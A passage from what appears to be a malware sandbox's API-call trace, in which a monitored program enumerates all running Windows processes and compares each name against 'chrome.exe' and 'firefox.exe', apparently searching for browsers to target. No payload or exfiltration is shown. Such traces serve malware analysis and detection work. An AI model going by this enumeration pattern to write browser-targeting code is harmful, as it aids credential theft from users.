lstrcmpA (lpString1="conhost.exe", lpString2="chrome.exe") returned 1 [0183.444] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.444] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.445] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.445] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.447] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.447] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.448] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="chrome.exe") returned -1 [0183.448] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.448] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.450] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.450] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.450] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.451] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.451] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.451] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0183.453] lstrcmpA (lpString1="dllhost.exe", lpString2="chrome.exe") returned 1 [0183.453] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.453] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.454] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.454] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.454] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.455] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.455] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.455] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.457] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.457] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.457] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.458] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.458] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.458] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.460] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.460] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.460] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0183.462] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="chrome.exe") returned 1 [0183.462] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.462] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0183.464] lstrcmpA (lpString1="dllhost.exe", lpString2="chrome.exe") returned 1 [0183.464] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.464] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5f842777, th32DefaultHeapID=0x0, th32ModuleID=0x8000a077, cntThreads=0x1, th32ParentProcessID=0x5ecd0000, pcPriClassBase=32764, dwFlags=0x14f198, szExeFile="")) returned 0 [0183.465] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0183.465] CloseHandle (hObject=0x648) returned 1 [0183.465] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffc5ecfe800 [0183.465] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x648 [0183.659] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32First") returned 0x7ffc5ed185d0 [0183.659] Process32First (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.661] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.661] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x84, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.662] lstrcmpA (lpString1="System", lpString2="firefox.exe") returned 1 [0183.662] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.662] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.676] lstrcmpA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0183.676] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.676] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.678] lstrcmpA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.678] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.678] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.679] lstrcmpA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0183.679] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.679] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.680] lstrcmpA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.681] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.681] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.682] lstrcmpA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0183.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.682] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.683] lstrcmpA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0183.683] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.683] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.684] lstrcmpA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0183.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.684] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.685] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.685] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.685] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.687] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.687] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.687] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.688] lstrcmpA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0183.688] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.688] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.689] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.689] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.689] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.690] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.690] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.692] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.692] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.692] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.693] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.694] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.694] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.695] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.695] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.695] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.696] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.696] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.696] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.699] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.699] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.700] lstrcmpA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0183.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.700] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.701] lstrcmpA (lpString1="sihost.exe", lpString2="firefox.exe") returned 1 [0183.701] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.701] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.702] lstrcmpA (lpString1="RuntimeBroker.exe", lpString2="firefox.exe") returned 1 [0183.702] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.702] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.703] lstrcmpA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.703] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.703] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.704] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.705] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.705] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0183.864] lstrcmpA (lpString1="OfficeClickToRun.exe", lpString2="firefox.exe") returned 1 [0183.864] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.864] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0183.866] lstrcmpA (lpString1="taskhostw.exe", lpString2="firefox.exe") returned 1 [0183.866] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.866] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0183.867] lstrcmpA (lpString1="SkypeHost.exe", lpString2="firefox.exe") returned 1 [0183.867] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.867] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0183.868] lstrcmpA (lpString1="ShellExperienceHost.exe", lpString2="firefox.exe") returned 1 [0183.868] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.868] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0183.871] lstrcmpA (lpString1="SearchUI.exe", lpString2="firefox.exe") returned 1 [0183.871] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.871] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.872] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.872] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.872] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.873] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.874] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.874] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0183.874] lstrcmpA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0183.875] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.875] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.876] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.876] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.876] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.877] lstrcmpA (lpString1="iexplore.exe", lpString2="firefox.exe") returned 1 [0183.877] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.877] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="television-room.exe")) returned 1 [0183.878] lstrcmpA (lpString1="television-room.exe", lpString2="firefox.exe") returned 1 [0183.879] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.879] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thought.exe")) returned 1 [0183.880] lstrcmpA (lpString1="thought.exe", lpString2="firefox.exe") returned 1 [0183.880] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.880] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="full.exe")) returned 1 [0183.881] lstrcmpA (lpString1="full.exe", lpString2="firefox.exe") returned 1 [0183.881] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.882] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-organization.exe")) returned 1 [0183.883] lstrcmpA (lpString1="travel-organization.exe", lpString2="firefox.exe") returned 1 [0183.883] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.883] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="productcasechallenge.exe")) returned 1 [0183.884] lstrcmpA (lpString1="productcasechallenge.exe", lpString2="firefox.exe") returned 1 [0183.884] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0183.884] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: 